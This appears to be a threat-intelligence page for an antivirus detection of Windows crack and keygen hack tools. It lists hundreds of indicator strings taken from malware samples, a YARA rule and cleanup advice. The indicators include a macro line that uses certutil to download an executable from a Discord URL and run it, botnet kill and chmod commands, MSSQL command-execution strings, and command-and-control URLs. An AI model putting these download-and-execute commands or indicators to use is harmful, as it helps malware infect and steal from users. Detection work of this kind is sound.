Concrete signature match: Hack Tool - Tool used to exploit vulnerabilities for 32-bit Windows platform, family Crack
This concrete detection identifies a hack tool designed to bypass software protection. It carries significant risk, as it's strongly associated with known malware families like Brontok and JowoBot, potentially facilitating information theft and botnet activities.
Relevant strings associated with this threat:
- proxy.txt (PEHSTR)
- CracksAll (PEHSTR)
- SOFTWARE\KAZAA\LocalContent (PEHSTR)
- \cmd.exe (PEHSTR)
- spybot1.2c (PEHSTR)
- AVP_Crack.exe (PEHSTR)
- zoneallarm_pro_crack.exe (PEHSTR)
- AVP_Crack (PEHSTR)
- Cracker Game. (PEHSTR)
- XXX Virtual Sex. (PEHSTR)
- Credit Card. (PEHSTR)
- Hacker. (PEHSTR)
- Norton Keygen. (PEHSTR)
- Hotmail Hack. (PEHSTR)
- ICQ Hack. (PEHSTR)
- porn. (PEHSTR)
- crack. (PEHSTR)
- \Kazza (PEHSTR)
- \Morpheus (PEHSTR)
- \Grokster (PEHSTR)
- \Bearshare (PEHSTR)
- \Gnucleus (PEHSTR)
- \Edonkey2000\Incoming (PEHSTR)
- BRONTOK.C[22] (PEHSTR)
- A######################### BRONTOK.C[22] ######################### (PEHSTR)
- #JowoBot-CrackHost (PEHSTR)
- #JowoBot-VM Community (PEHSTR)
- Brontok.A (PEHSTR)
- Brontok.A.HVM31 (PEHSTR)
- /aff-light/affcgi/installed.fcgi?userid=20001 (PEHSTR_EXT)
- /aff-light/affcgi/install.php?userid=20001 (PEHSTR_EXT)
- \ServicePackFiles\i386\mswsock.dll (PEHSTR_EXT)
- http://litlemouse.info/a/49.dat (PEHSTR_EXT)
- /cgi-script/repeaterm3.fcgi?v5 (PEHSTR_EXT)
- Content-Type: image/x-gif (PEHSTR_EXT)
- Content-Type: image/gif (PEHSTR_EXT)
- \dllcache\mswsock.dll (PEHSTR_EXT)
- InternetCrackUrlA (PEHSTR_EXT)
- \mswsockhh.dll (PEHSTR_EXT)
- gif/chgif.exe (PEHSTR_EXT)
- \mswsock.bak (PEHSTR_EXT)
- png/png.exe (PEHSTR_EXT)
- jpg/jpg.exe (PEHSTR_EXT)
- 6Dis iz ToTo V.1 ... Dont worry ! Everything is Okey...2 (PEHSTR)
- C:\WINDOWS\SYSTEM32\autoexec.nt2 (PEHSTR)
- 0@COPY C:\WINDOWS\svhost.bak C:\WINDOWS\Adobe.exe (PEHSTR)
- MSN_Hacker_v3.exe (PEHSTR)
- Windows_Vista_Activation.exe (PEHSTR)
- Windows_Vista_Crack.exe (PEHSTR)
- Nero_7_Keygen.exe (PEHSTR)
- Yahoo_Hacker_V2.exe (PEHSTR)
- NAV_2006_Keygen.exe (PEHSTR)
- Office_2007_Crack.exe (PEHSTR)
- Visual_Studio_2005_Crack.exe (PEHSTR)
- Hotmail_Hack_V1.exe (PEHSTR)
- C:\Program Files\eMule\Incoming\ (PEHSTR)
- !C:\Program Files\Kazaa\My Shared\ (PEHSTR)
- /C:\Program Files\StreamCast\Morpheus\My Shared\ (PEHSTR)
- chgif.exe (PEHSTR_EXT)
- Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv: (PEHSTR_EXT)
- Setup.zip.exe (PEHSTR)
- p2pex.zip.exe (PEHSTR)
- www.regione.calabria.it (PEHSTR)
- -Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR)
- You Are Empty.zip.exe (PEHSTR)
- Windows Xp on PsP.zip.exe (PEHSTR)
- Half Life 2 Episode One.zip.exe (PEHSTR)
- DOOM 3 Full 3 CD Bonus.zip.exe (PEHSTR)
- -Windows Vista Ultimate SP3 2007 Crack.zip.exe (PEHSTR)
- InternetCrackUrlAd (PEHSTR)
- 202.67.220.219/trafc-2/rfe.phpd (PEHSTR)
- search.about.com (PEHSTR)
- search.aol.co (PEHSTR)
- search.asiaco.com (PEHSTR)
- search.daum.net (PEHSTR)
- search.dmoz.org (PEHSTR)
- search.earthlink.net (PEHSTR)
- search.gohip.com (PEHSTR)
- search.looksmart.com (PEHSTR)
- search.lycos.co.uk (PEHSTR)
- search.lycos.com (PEHSTR)
- search.msn.co (PEHSTR)
- search.msn.fr (PEHSTR)
- search.netscape.com (PEHSTR)
- search.netzero.net (PEHSTR)
- search.sympatico.msn.ca (PEHSTR)
- search.wanadoo.co.uk (PEHSTR)
- search.xtramsn.co.nz (PEHSTR)
- search.yahoo.co (PEHSTR)
- %s + CRACK + ACTIVATOR.EXE (PEHSTR)
- %s + CRACK + NOCD.exe (PEHSTR)
- %s - NoCD Crack KeyGen.exe (PEHSTR)
- back.hasteman.com (PEHSTR)
- ads.zablen.com (PEHSTR)
- "rel.statadd.com/d/dn/dll/zlib1.dll (PEHSTR)
- C:\TEMP\win32.dll (PEHSTR)
- https\shell\open\command (PEHSTR)
- SOFTWARE\Borland\Delphi\RTL (PEHSTR)
- ;Software\Microsoft\Windows\CurrentVersion\Internet Settings (PEHSTR)
- Steam PW - Cracker (PEHSTR)
- Fuck the one who is trying to Crack this Application :D _From B56mx ! (PEHSTR_EXT)
- C:\WINDOWS\system32\MSVBVM60.DLL\3 (PEHSTR_EXT)
- Fuck the one who is trying to Crack this Application :D (PEHSTR_EXT)
- DllCanUnloadNow (PEHSTR_EXT)
- DllGetClassObject (PEHSTR_EXT)
- DllRegisterServer (PEHSTR_EXT)
- DllUnregisterServer (PEHSTR_EXT)
- CMD One (PEHSTR_EXT)
- CrackMe.sys (PEHSTR_EXT)
- MapleStory*.ini (PEHSTR_EXT)
- SSDTShellHook.dll (PEHSTR_EXT)
- ws2_32.dll (PEHSTR_EXT)
- steamcrack (PEHSTR_EXT)
- Steam Game Cracker (PEHSTR_EXT)
- ,bot.cjfeeds.com/tasks.php?cj=%s&domain=%s&v= (PEHSTR)
- cjb\cjb8.exe (PEHSTR)
- -SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR)
- InternetCrackUrlA (PEHSTR)
- %s\%s\calc.cfg (PEHSTR_EXT)
- %s\%s\calc.exe (PEHSTR_EXT)
- %s - NoCD Crack KeyGen.exe (PEHSTR_EXT)
- %s Crack Patch Serial Keygen.exe (PEHSTR_EXT)
- %s + CRACK + NOCD.exe (PEHSTR_EXT)
- %s + CRACK + ACTIVATOR.EXE (PEHSTR_EXT)
- %s keygen crack patch.exe (PEHSTR_EXT)
- %s_crack_keygen.exe (PEHSTR_EXT)
- dnshop.com (PEHSTR)
- ilikeclick.com (PEHSTR)
- interich.com (PEHSTR)
- linkprice.com (PEHSTR)
- HttpOpenRequestA (PEHSTR)
- GET /search.php?p=%04d&s=%s&v=%s&t=%ld&q=%s HTTP/1.1 (PEHSTR_EXT)
- .assembly (PEHSTR_EXT)
- 123812938y1293812y39128y312983.dat (PEHSTR_EXT)
- /url? (PEHSTR_EXT)
- /aclk? (PEHSTR_EXT)
- etCrackU (PEHSTR_EXT)
- I got infected from REMOVABLE DEVICE. (PEHSTR_EXT)
- \\.\blzblzblz (PEHSTR_EXT)
- \drivers\blzblzblz.sys (PEHSTR_EXT)
- SbieDll.dll (PEHSTR_EXT)
- L4F-Left4Dead-Online-Crack (PEHSTR_EXT)
- \blazewrm.vmx (PEHSTR_EXT)
- Crypt\DarEye (PEHSTR_EXT)
- Cracked by (PEHSTR_EXT)
- CrackIt_Click (PEHSTR)
- winrt_cracking\ (PEHSTR)
- Hschtasks /change /disable /TN "\Microsoft\Windows\WS\License Validation" (PEHSTR)
- SmartStealer Cracked (PEHSTR_EXT)
- //%s:8888/ups.rar (PEHSTR_EXT)
- //%s:8888/wpd.dat (PEHSTR_EXT)
- //%s:8888/wpdmd5.txt (PEHSTR_EXT)
- //down2.b5w91.com:8443 (PEHSTR_EXT)
- /shell?%s (PEHSTR_EXT)
- ;exec sp_add_jobserver (PEHSTR_EXT)
- ;EXEC sp_droplogin (PEHSTR_EXT)
- ;exec(@a); (PEHSTR_EXT)
- <sip:carol@chicago.com> (PEHSTR_EXT)
- @name='bat.exe',@freq_type=4,@active_start_date (PEHSTR_EXT)
- @shell INT EXEC SP_ (PEHSTR_EXT)
- [Cracker:CCTV] (PEHSTR_EXT)
- [Cracker:MSSQL] (PEHSTR_EXT)
- [Cracker:MSSQL] Host:%s, blindExec CMD: %s (PEHSTR_EXT)
- [Cracker:RDP] (PEHSTR_EXT)
- [Cracker:Telnet] (PEHSTR_EXT)
- [Cracker] (PEHSTR_EXT)
- [ExecCode] (PEHSTR_EXT)
- [ExecCode]AUTHORIZATION [dbo] FROM 0x4D5A (PEHSTR_EXT)
- \Run','rundll32'; (PEHSTR_EXT)
- Cracking Firewall (PEHSTR_EXT)
- hackerBoi\hackerBoi\obj\Debug\hackerBoi.pdb (PEHSTR_EXT)
- Setup=KMSpico-setup.exe (PEHSTR_EXT)
- Setup=kmsh.exe (PEHSTR_EXT)
- Setup=dllservsys.exe (PEHSTR_EXT)
- Setup=kmsb.exe (PEHSTR_EXT)
- Setup=kmspicoh.exe (PEHSTR_EXT)
- Setup=kmsdlli.exe (PEHSTR_EXT)
- Setup=kmspicov.exe (PEHSTR_EXT)
- FullCrack.vn_KMSpico_10. (PEHSTR_EXT)
- _setup.rar (PEHSTR_EXT)
- Password : fullcrack.vn (PEHSTR_EXT)
- \KMSpico-setup.exe (PEHSTR_EXT)
- \kmsdll.exe (PEHSTR_EXT)
- Password Cracker.exe (PEHSTR)
- Hotmail Hacker.exe (PEHSTR)
- NetBIOS Hacker.exe (PEHSTR)
- ICQ Hacker.exe (PEHSTR)
- Website Hacker.exe (PEHSTR)
- Keylogger.exe (PEHSTR)
- CometHitMove (PEHSTR_EXT)
- i2.tietuku.com/ (PEHSTR_EXT)
- League of Legends.exe (PEHSTR_EXT)
- lol.launcher_tencent.exe (PEHSTR_EXT)
- LolClient.exe (PEHSTR_EXT)
- CrackMe (PEHSTR_EXT)
- path.ini (PEHSTR_EXT)
- .tietuku.com/ (PEHSTR_EXT)
- HttpCrackUrl (PEHSTR_EXT)
- shield_2345explorer.exe (PEHSTR_EXT)
- Cracker Jack (PEHSTR_EXT)
- CrackingPatching (PEHSTR_EXT)
- IDMan.exe (PEHSTR_EXT)
- crackingpatching.com (PEHSTR_EXT)
- combobox (PEHSTR_EXT)
- Polish Medical Mailing Sp. z o.o. (PEHSTR_EXT)
- Crack (PEHSTR_EXT)
- WinRAR Cracker Edition Patch (PEHSTR_EXT)
- syborg1finf.exe (PEHSTR_EXT)
- Cracked (PEHSTR_EXT)
- RarExtInstaller.pdb (PEHSTR_EXT)
- C:\NeverShow.txt (PEHSTR_EXT)
- repacks.ddns.net (PEHSTR_EXT)
- repack.me (PEHSTR_EXT)
- cracker (PEHSTR_EXT)
- s:\IDM_projects\IDMIECC2\64bit\ReleaseMinDependency\IDMIECC64.pdb (PEHSTR_EXT)
- Activate.cmd (PEHSTR_EXT)
- PureFlat.tbi (PEHSTR_EXT)
- RIPPGrazey / PHF (PEHSTR)
- CONVGrazey / PHF (PEHSTR)
- JamCrackerPro (PEHSTR)
- keygenned by ice/BRD (PEHSTR_EXT)
- rarreg.key (PEHSTR_EXT)
- kentpw@norwich.net (PEHSTR_EXT)
- GDIScreenShot (PEHSTR_EXT)
- HttpOpenRequestA (PEHSTR_EXT)
- PasswordsList.txt (PEHSTR_EXT)
- ShellExecuteExW (PEHSTR_EXT)
- HttpSendRequestA (PEHSTR_EXT)
- HttpAddRequestHeadersA (PEHSTR_EXT)
- Browsers\Cookies (PEHSTR_EXT)
- Full-Source_ShareAppsCrack.com (PEHSTR_EXT)
- C:\Users\HiddenTask\Downloads (PEHSTR_EXT)
- UXTHEME.DLL (PEHSTR_EXT)
- SOFTWARE\Borland\Delphi\RTL (PEHSTR_EXT)
- shutdowntimer.Properties.Resources (PEHSTR_EXT)
- CrackerBarrelGame.Resources (PEHSTR_EXT)
- SecurityContextRunData.Resources (PEHSTR_EXT)
- Softworks_Rhino.Resources (PEHSTR_EXT)
- Grpppmde.pdb (PEHSTR_EXT)
- \Windows\Temp\Magix.exe (PEHSTR_EXT)
- video_pro_x.exe (PEHSTR_EXT)
- CrackGen (PEHSTR_EXT)
- /_/_/_/_/_/ (PEHSTR_EXT)
- commdlg_FindReplace (PEHSTR_EXT)
- Mqypdx\egc (PEHSTR_EXT)
- WinHttpCrackUrl (PEHSTR_EXT)
- Read Icon List for Delphi 3.0 (PEHSTR_EXT)
- Glyph.Data (PEHSTR_EXT)
- lld.isma\23metsyS\swodniW\:C (PEHSTR_EXT)
- WinHttpCheckPlatform (PEHSTR_EXT)
- ilia@valley.ru (PEHSTR_EXT)
- WndProcPtr%.8X%.8X (PEHSTR_EXT)
- vcltest3.dll (PEHSTR_EXT)
- Delphi.Ru (PEHSTR_EXT)
- winhttp (PEHSTR_EXT)
- FortniteRubiconCracked (PEHSTR_EXT)
- uplooder.net (PEHSTR_EXT)
- wener/ gifnocpi (PEHSTR_EXT)
- esaeler/ gifnocpi (PEHSTR_EXT)
- Server_Crack.rar (PEHSTR)
- \WinH%c%c%c32.exe (PEHSTR)
- C:\Program Files\7rar\ (PEHSTR)
- HTTPWebNode.Agent (PEHSTR_EXT)
- Borland SOAP 1.2 (PEHSTR_EXT)
- Borland_Protector Cracked v1.0 (PEHSTR_EXT)
- WpfPdfUnblocker.My.Resources (PEHSTR_EXT)
- //cdn.discordapp.com/attachments/ (PEHSTR_EXT)
- //github.com/ (PEHSTR_EXT)
- scr.jpg (PEHSTR_EXT)
- System.txt (PEHSTR_EXT)
- ip.txt (PEHSTR_EXT)
- = Shell("cmd /c certutil.exe -urlcache -split -f ""https://cdn.discordapp.com/attachments/984522909378809948/984528744188346428/NetflixCrackers_Bsjfstey.jpg"" Qwjuqoncb.exe.exe && Qwjuqoncb.exe.exe", vbHide) (MACROHSTR_EXT)
- CrackNames: 0x (PEHSTR_EXT)
- ] Screenshot downloaded: (PEHSTR_EXT)
- ADAC Routenplaner 2005-2006_keygen.exe (PEHSTR_EXT)
- Age Of Mythology no cd crack.exe (PEHSTR_EXT)
- Empire_At_War_NOCD_Crack.exe (PEHSTR_EXT)
- F.E.A.R CD and EXE Crack+keygen.exe (PEHSTR_EXT)
- Animation Workshop KeyGen.exe (PEHSTR_EXT)
- Harry Potter and The Sorcerers Stone no cd crack.exe (PEHSTR_EXT)
- InternetCrackUrlW (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- krrewiaog3u4npcg.onion.to/sl/gate.php (PEHSTR_EXT)
- /root/botnet/client/ (PEHSTR_EXT)
- new_botnet/s (PEHSTR_EXT)
- new_botnet/ra (PEHSTR_EXT)
- main.Att (PEHSTR_EXT)
- main.ini (PEHSTR_EXT)
- main.RunWi (PEHSTR_EXT)
- main.AntiCr (PEHSTR_EXT)
- main.LinuxSt (PEHSTR_EXT)
- eq.main.BotInf (PEHSTR_EXT)
- killall i .i mozi.m Mozi.m mozi.a Moz (PEHSTR_EXT)
- .a kaiten Nbrute minerd (PEHSTR_EXT)
- chmod 755 zero.%s; ./z (PEHSTR_EXT)
- ro.%sGET %s HTTP/%s (PEHSTR_EXT)
- 287/76/248/6;25125 (PEHSTR_EXT)
- selfRepo.Teln (PEHSTR_EXT)
- tCracker (PEHSTR_EXT)
- Users\Nisha\Desktop\Cracked PasteBin - 1337\Cracked PasteBin\obj\Debug\Setup.pdb (PEHSTR_EXT)
- Cracked_PasteBin.My (PEHSTR_EXT)
- Asgard-Crack (PEHSTR_EXT)
- Cracked Venom Rootkit (PEHSTR_EXT)
- 0D/}. (SNID)
- .<?wpu'&@N9 (SNID)
- Tom Clancys Ghost Recon - Desert Siege no cd crack.exe (PEHSTR_EXT)
- Sponge Bob Square Pants - Operation Krabby Patty no cd crack.exe (PEHSTR_EXT)
- balROK_state[Crack].EXE (PEHSTR_EXT)
- Star Wars - Jedi Knight - Jedi Academy no cd crack.exe (PEHSTR_EXT)
- Command & Conquer - Generals no cd crack.exe (PEHSTR_EXT)
- RollerCoaster Tycoon NO CD Crack (Including Attractions Pack).exe (PEHSTR_EXT)
- Call Of Duty no cd crack.exe (PEHSTR_EXT)
- /config/gjc.txt (PEHSTR_EXT)
- mobile.yangkeduo.com (PEHSTR_EXT)
- item.taobao.com (PEHSTR_EXT)
- ShellExecuteA (PEHSTR_EXT)
- V5m.com (PEHSTR_EXT)
- browser.Credential (PEHSTR_EXT)
- FirefoxCrackLoginData (PEHSTR_EXT)
- Dont Crack My Program (PEHSTR_EXT)
- klassifikationen.Sur (PEHSTR_EXT)
- mediative\prioriteterne\smuglings (PEHSTR_EXT)
- beklages.lnk (PEHSTR_EXT)
- Besaetter\Propagandism.Ens (PEHSTR_EXT)
- bassetternes.for (PEHSTR_EXT)
- Crackerberry (PEHSTR_EXT)
- upstay.fac (PEHSTR_EXT)
- septenarii\pelsbereder\sammenfatningen (PEHSTR_EXT)
- suderne.fas (PEHSTR_EXT)
- stratificerendes.hen (PEHSTR_EXT)
- Partaker195.est (PEHSTR_EXT)
- merinould.mon (PEHSTR_EXT)
- fraadserierne.rip (PEHSTR_EXT)
- Dear Cracker , Please immediately stop the anti compiler behavior (PEHSTR_EXT)
- Anti cracking service By (PEHSTR_EXT)
- www.you-m.com/do.aspx (PEHSTR_EXT)
- 8@VBScript.RegExp (PEHSTR_EXT)
- 202.189.7.231 (PEHSTR_EXT)
- eaigpuex.dll (PEHSTR_EXT)
- Eai.dll (PEHSTR_EXT)
- HttpModRespDLLx64.pdb (PEHSTR_EXT)
- HttpModDLL.dll (PEHSTR_EXT)
- 2$.`j-f (SNID)
- software\searchhook (REGKEY)
- WinGenerics.dll (PEHSTR)
- InternetCrackUrl (PEHSTR)
- Software\Apropos\Client (PEHSTR_EXT)
- AproposUninst.ini (PEHSTR_EXT)
- adchannel.a (PEHSTR_EXT)
- Software\AdMedia\Client (PEHSTR_EXT)
- AdMediaUninst.ini (PEHSTR_EXT)
- Winhelper::Registry::read_string: RegQueryValueEx failed. Last error = 0x (PEHSTR_EXT)
- http://66.98.138.92/PH/ (PEHSTR_EXT)
- SOFTWARE\Apropos\Client (PEHSTR_EXT)
- /status (PEHSTR_EXT)
- WinGenerics.dll (PEHSTR_EXT)
- download.contextplus.net (PEHSTR_EXT)
- adchannel.contextplus.net (PEHSTR_EXT)
- /apropos/client/LDV_<<version>> (PEHSTR_EXT)
- /shared/Msvcp60Installer.exe (PEHSTR_EXT)
- /services/AUServer (PEHSTR_EXT)
- HookDll.dll (PEHSTR_EXT)
- http://download.contextplus.net/shared/Msvcp60Installer.exe (PEHSTR_EXT)
- Software\AutoLoader (PEHSTR_EXT)
- 4Fuck the one who is trying to Crack this Application (PEHSTR)
- /cnt.jpg (PEHSTR_EXT)
- %s\%c%c%c%c%c.%s (PEHSTR_EXT)
- Explorer.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion (PEHSTR_EXT)
- explorer.exe (PEHSTR_EXT)
- http://85 (PEHSTR_EXT)
- InitializeSecurityDescriptor (PEHSTR_EXT)
- SetSecurityDescriptorDacl (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ (PEHSTR_EXT)
- Software\Microsoft\Internet Explorer\TypedURLsL (PEHSTR_EXT)
- http://5starvideos.com/main/K (PEHSTR_EXT)
- usage count exceeded, please download a new version.2 (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\X Password Generator (PEHSTR_EXT)
- Software\Microsoft\Internet Explorer\TypedURLsd (PEHSTR_EXT)
- http://www.xpassgenerator.com/software/d (PEHSTR_EXT)
- http://5starvideos.com/main/ (PEHSTR_EXT)
- X Password Generator usage count exceeded, please download a new version.K (PEHSTR_EXT)
- X Password Generator installation information was corrupted, please reinstall X Password Generator. (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PornPass Manager (PEHSTR_EXT)
- http://www.pornpassmanager.com/d (PEHSTR_EXT)
- PornPass Manager usage count exceeded, please download a new version.K (PEHSTR_EXT)
- PornPass Manager installation information was corrupted, please reinstall PornPass Manager. (PEHSTR_EXT)
- Title="Crack and Serial" (PEHSTR)
- BeginPrompt="Disable antiviruses before patching!\nContinue?" (PEHSTR)
- RunProgram="setup.bat" (PEHSTR)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)rule HackTool_Win32_Crack_2147745913_0
{
meta:
author = "threatcheck.sh"
detection_name = "HackTool:Win32/Crack!MTB"
threat_id = "2147745913"
type = "HackTool"
platform = "Win32: Windows 32-bit platform"
family = "Crack"
severity = "High"
info = "MTB: Microsoft Threat Behavior"
signature_type = "SIGNATURE_TYPE_PEHSTR_EXT"
threshold = "6"
strings_accuracy = "High"
strings:
$x_2_1 = "RarExtInstaller.pdb" ascii //weight: 2
$x_1_2 = "C:\\NeverShow.txt" ascii //weight: 1
$x_1_3 = "OnClick" ascii //weight: 1
$x_1_4 = "repacks.ddns.net" ascii //weight: 1
$x_1_5 = "repack.me" ascii //weight: 1
$x_1_6 = "Activation" ascii //weight: 1
condition:
(filesize < 20MB) and
(
((1 of ($x_2_*) and 4 of ($x_1_*))) or
(all of ($x*))
)
}c3d568da2c0055824bfc629de90970014fe15164693f7acc478dc7e06891516fIsolate the affected system, perform a comprehensive antivirus scan to remove the threat and any associated malware, and educate users on avoiding unauthorized software sources.